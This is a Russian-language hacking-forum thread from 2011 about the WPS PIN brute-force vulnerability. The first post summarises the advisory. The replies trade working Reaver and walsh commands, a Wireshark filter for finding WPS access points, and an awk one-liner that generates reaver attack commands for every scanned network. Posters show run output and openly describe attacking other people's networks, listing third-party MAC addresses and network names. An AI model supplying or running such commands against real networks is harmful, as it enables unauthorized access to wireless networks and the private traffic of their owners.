HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Беспроводные технологии/Wi-Fi/Wardriving
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 30.12.2011, 01:22
gpuhash
Постоянный
Регистрация: 22.09.2011
Сообщений: 471
Провел на форуме:
103885

Репутация: 97
По умолчанию

Уязвимость в протоколе Wi-Fi Protected Setup

Организация US Computer Emergency Readiness Team опубликовала бюллетень безопасности, описывающий уязвимость в протоколе WPS (Wi-Fi Protected Setup), предназначенном для облегчения настройки безопасности беспроводных роутеров и сетей. Сам протокол — его оригинальное название Wi-Fi Simple Config — был разработан в 2009 году специалистами ассоциации Wi-Fi Alliance целью дать возможность с некоторой долей безопасности пользоваться Wi-Fi лицам, мало сведущим в протоколах и стойких методах шифрования.

Традиционно при создании новых WLAN необходимо было выбрать сетевое имя и кодовую фразу для точки доступа, а позднее то же самое — для каждого нового устройства, добавляемого к сети. WPS для упрощения процедуры для конечного пользователя возлагает функцию генерации сетевого имени на саму точку доступа. Для добавления нового клиентского устройства к защищенной сети достаточно будет ввести PIN-код из 4 или 8 цифр или нажать на специальные клавиши, имеющиеся на роутере и добавляемом устройстве.

Суть уязвимости заключается в специфике общения между собой точки доступа и новым беспроводным устройством. Злоумышленник, желая получить доступ к сети жертвы, посылает некий PIN-код для аутентификации на роутере. В ответ на неправильный PIN посылается EAP-NACK сообщение таким образом, что хакер способен определить первую половину цифр PIN-кода, а вторую половину оказывается возможным определить, анализируя контрольную сумму при передаче PIN. Все это приводит к тому, что атака методом «грубой силы», вероятней всего, завершится успехом, поскольку число необходимых попыток уменьшается с 10^8 до 10^4+10^3 = 11.000, а время полного перебора PIN-кодов составит от нескольких часов до нескольких суток, в зависимости от реализации WPS на роутере.

Пока решения проблемы не существует и тем, у кого роутер настроен на упрощенную схему безопасности, рекомендуется использовать традиционную схему аутентификации. Netgear, D-Link, Belkin и другие производители пока не прокомментировали сообщение об уязвимости.

Копипаст с хабра

Документ с описанием уязвимости (англ.)

Добрые люди уже написали WPS брутфорсер



любые вопросы не по теме удаляются !! выкладывать только инфу WPS , (reaver)

// добавлено в карту раздела.

за троль оффтоп , бан от 7 суток .
 
Ответить с цитированием

  #2  
Старый 30.12.2011, 12:48
EksTasy
Познающий
Регистрация: 26.10.2008
Сообщений: 61
Провел на форуме:
478326

Репутация: 2
По умолчанию

никто не компилил?

скрипт на питоне от самого автора

http://dl.dropbox.com/u/22108808/wpscrack.zip
 
Ответить с цитированием

  #3  
Старый 30.12.2011, 14:04
KUKLOVOD2
Познающий
Регистрация: 12.05.2011
Сообщений: 88
Провел на форуме:
31256

Репутация: 1
По умолчанию

попробовал юзнуть wps-bruteeforcer, при команде reaver -i mon0 -b mac -c [канал\ -e [essid] пишет Failed to associate with [mac]
 
Ответить с цитированием

  #4  
Старый 01.01.2012, 13:56
jabberd
Новичок
Регистрация: 03.05.2010
Сообщений: 0
Провел на форуме:
922

Репутация: 0
По умолчанию

Стоит, наверное, обновить Reaver с помощью svn up, проблема ассоциации была решена. У меня, к сожалению, на роутере Netgear WNR3500L не работает WPS по причине установленной прошивки Tomato-USB. На чужих сетях ничего не получается, хотя Wireshark и показывает наличие настроенного WPS. У кого-нибудь уже получалось подобрать PIN и получить WPA-PSK?
 
Ответить с цитированием

  #5  
Старый 03.01.2012, 13:22
kosmaty
Участник форума
Регистрация: 26.09.2011
Сообщений: 292
Провел на форуме:
99610

Репутация: 27
По умолчанию

У меня не получилось и не получится.... А жаль.

ТД организована не на базе роутера, а по-взрослому - Ubiquiti. А там такая дырявая вещь, как WPS не применяется....
 
Ответить с цитированием

  #6  
Старый 03.01.2012, 15:09
zuriuslev
Member
Регистрация: 24.12.2011
Сообщений: 142
Провел на форуме:
37847

Репутация: 20
По умолчанию

Цитата:
Сообщение от jabberd  

хотя Wireshark и показывает наличие настроенного WPS.

Простите новичка, а как определить в Wireshark, что включен WPS ? Может фильтр какой есть ?
 
Ответить с цитированием

  #7  
Старый 03.01.2012, 15:35
penixx
Member
Регистрация: 24.06.2011
Сообщений: 151
Провел на форуме:
29565

Репутация: 8
По умолчанию

Цитата:

попробовал юзнуть wps-bruteeforcer, при команде reaver -i mon0 -b mac -c [канал\ -e [essid] пишет Failed to associate with [mac]

ассоциация есть, но дальше ничего, пробовал 2 раза по 5 минут ждать

root@bt:~# reaver -i mon0 -b ------------

Reaver v1.2 WiFi Protected Setup Attack Tool

Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

[+] Waiting for beacon from ------------

[+] Associated with ------------ (ESSID: ------------)

[+] 0.00% complete @ 0 seconds/attempt

[+] 0.00% complete @ 0 seconds/attempt

буду на других точках пробовать
 
Ответить с цитированием

  #8  
Старый 03.01.2012, 16:36
jabberd
Новичок
Регистрация: 03.05.2010
Сообщений: 0
Провел на форуме:
922

Репутация: 0
По умолчанию

Цитата:
Сообщение от zuriuslev  

Простите новичка, а как определить в Wireshark, что включен WPS ? Может фильтр какой есть ?

Я ставил фильтр: wps.wifi_protected_setup_state == 0x02

Мог и ошибиться, конечно, но в любом случае копать в тег-параметры (vendor specific) beacon-пакетов.

P.S. сейчас в Reaver есть программа walsh, которая показывает точки со включённой WPS.
 
Ответить с цитированием

  #9  
Старый 03.01.2012, 17:55
KUKLOVOD2
Познающий
Регистрация: 12.05.2011
Сообщений: 88
Провел на форуме:
31256

Репутация: 1
По умолчанию

поподробнее про walsh плз
 
Ответить с цитированием

  #10  
Старый 03.01.2012, 19:32
zuriuslev
Member
Регистрация: 24.12.2011
Сообщений: 142
Провел на форуме:
37847

Репутация: 20
По умолчанию

Цитата:
Сообщение от KUKLOVOD2  

поподробнее про walsh плз

Например -

walsh -i mon0 -o WPS.list

grep -v "bad FCS" WPS.list

и полусаем, что-то вроде -

Scanning for supported APs...

54:E6:FC1:18:F6 (null)

D8:5D:4C:F3:44:6A ApptNet

00:22:75:52:BD:4E Belkin_N_Wireless_52bd4e

00:1D:7E:B4:1F:B6 lafferty

00:19:150:5C:29 WLAN_5C29

00:24:17:BB:44:BD ThomsonE4849E

00:50:7F:7C:E5:F8 Ellie

-----------------------------------------

Можно коммандный файл сгенерить -

awk '/[0-9][A-F]/{print "reaver -i mon0 -b "$1" -e "$2}' WPS.list

---------------------------------------------------------------

У меня пока безуспешно ... Пару раз проскакивало -

[+] Trying pin 84490445

Но дальше не продвигается.

Кстати , walsh ловит ВСЕ точки c WPS и OPEN (без шифрования тоже)

Напустил его на OPEN точку, работает ...

[+] Waiting for beacon from 00:22:75:52:BD:4E

[+] Associated with 00:22:75:52:BD:4E (ESSID: Belkin_N_Wireless_52bd4e)

[+] 0.01% complete @ 37 seconds/attempt

[+] 0.03% complete @ 20 seconds/attempt

[+] 0.05% complete @ 19 seconds/attempt

[+] 0.07% complete @ 16 seconds/attempt

[+] 0.08% complete @ 31 seconds/attempt
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.